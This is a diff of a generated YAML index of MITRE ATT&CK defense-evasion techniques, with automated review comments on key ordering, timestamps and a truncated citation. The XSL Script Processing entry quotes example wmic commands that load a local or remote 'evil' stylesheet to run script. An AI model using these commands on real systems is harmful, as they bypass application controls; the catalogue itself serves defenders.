- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -13335,12 +13643,11 @@ defense-evasion:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1216.002:
technique:
- modified: '2024-04-18T23:51:40.464Z'
+ modified: '2024-09-12T19:42:21.547Z'
name: SyncAppvPublishingServer
description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -13400,8 +13707,8 @@ defense-evasion:
- source_name: 7 - appv
description: Nick Landers. (2017, August 8). Need a signed alternative to
Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
- Retrieved February 6, 2024.
- url: https://twitter.com/monoxgas/status/895045566090010624
+ Retrieved September 12, 2024.
+ url: https://x.com/monoxgas/status/895045566090010624
- source_name: 3 - appv
description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
Evasion (T1202). Retrieved February 6, 2024.'
@@ -13418,37 +13725,18 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
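Review bot: the new T1548.006 description uses the `|+` block scalar indicator, which keeps every trailing newline, and the block is followed by an empty line before `kill_chain_phases`, so the value now ends in two newlines instead of the single `\n` the old double-quoted scalar ended with. Every other multi-line description in this diff uses `|-` (T1027.010 and T1070.004, for example); emitting `|-` here, or at least `|`, keeps the values comparable across techniques and avoids a spurious diff the next time the generator normalises whitespace. The prose itself is upstream wording and should not be hand-edited in this generated file.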
@@ -13456,6 +13744,8 @@ defense-evasion:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -13463,7 +13753,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -13493,7 +13783,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -13539,7 +13828,7 @@ defense-evasion:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -13584,8 +13873,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.007:
technique:
@@ -13630,7 +13917,7 @@ defense-evasion:
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-08-23T18:32:46.899Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Obfuscated Files or Information: Dynamic API Resolution'
x_mitre_detection: ''
@@ -13644,58 +13931,28 @@ defense-evasion:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027.007
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
@@ -13712,6 +13969,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -13726,21 +13986,52 @@ defense-evasion:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -13785,9 +14076,8 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
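Review bot: replacing the `Azure AD` and `SaaS` platforms with the single value `Identity Provider` (with the 3.0 to 3.1 bump) is an upstream rename, but it changes how T1484 is grouped: any index or report in this repository that buckets techniques by platform string will stop listing T1484 under the old names and needs `Identity Provider` added to its mapping, otherwise the technique silently drops out of the cloud and identity views. A grep for the literal `Azure AD` across the generated indexes before merging would catch any stragglers.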
@@ -13844,8 +14134,8 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -13854,57 +14144,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1220:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
- created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1220
- url: https://attack.mitre.org/techniques/T1220
- - source_name: Reaqta MSXSL Spearphishing MAR 2018
- url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
- description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
- MSXSL. Retrieved July 3, 2018.
- - source_name: Twitter SquiblyTwo Detection APR 2018
- url: https://twitter.com/dez_/status/986614411711442944
- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
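Review bot: this hunk deletes the whole T1220 `external_references` block, including the `Twitter SquiblyTwo Detection APR 2018` entry with its twitter.com URL; the rebuilt block begins in the next hunk but is cut off before that entry, so please check that it comes back with the `x.com` host and a refreshed `Retrieved` date like the other Twitter references in this diff (T1027.010 and T1216.002). Also note that the removed `Microsoft XSLT Script Mar 2017` description reads `XSLT Stylesheet Scripting Using . Retrieved July 3, 2018.` with a word missing before the period, most likely an angle-bracketed element name stripped as markup; if the regenerated entry shows the same gap, the generator's description handling is dropping it and should escape rather than strip such tokens.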
@@ -13922,29 +14166,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
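Review bot: The re-emitted reference for "Microsoft XSLT Script Mar 2017" still carries the truncated title "XSLT Stylesheet Scripting Using . Retrieved July 3, 2018." (the `+` line reproduces the same gap as the `-` line it replaces); the URL slug `xslt-stylesheet-scripting-using-msxsl-script` shows the missing word is the angle-bracketed `<msxsl:script>` element, so the generator or its upstream source is stripping tag-like text from descriptions. Fix the string handling rather than carrying the defect forward. Separately, most of this hunk is key reordering with unchanged values (`modified`, `name`, `kill_chain_phases`, `external_references`, `x_mitre_system_requirements` all move), which buries the one substantive reference change (the SquiblyTwo status link moving to x.com with a 2024 retrieval date); emitting keys in a stable order would keep future regenerations reviewable.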
@@ -13977,7 +14265,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
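Review bot: The `modified` timestamp for T1564.001 moves backwards, from `2021-04-29T14:49:39.188Z` to `2020-03-29T22:32:25.985Z`. The same regression recurs in later hunks of this patch, and every replaced value shares a `T14:00:00.188Z`-style suffix, which suggests the old values were batch stamps rather than the objects' real modification times. Confirm that the new values come from the upstream STIX objects and that no consumer treats a `modified` value older than the one it already holds as a reason to skip the update.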
@@ -14005,48 +14293,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
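Review bot: `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1564.001 with no replacement anywhere in this hunk, and `spec_version` is dropped from every object in the patch. If dropping the STIX `spec_version` is a deliberate generator change, say so in the commit message and check that nothing downstream reads it; if a bare `x_mitre_attack_spec_version` is still expected on each object, T1564.001 is now missing it. The deletion of the whole `external_references` block for T1578.001 at the top of the technique, only for it to be re-emitted lower down in the next hunk, is the same key-ordering churn noted above and would disappear with stable key ordering.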
@@ -14055,6 +14306,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -14063,20 +14317,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
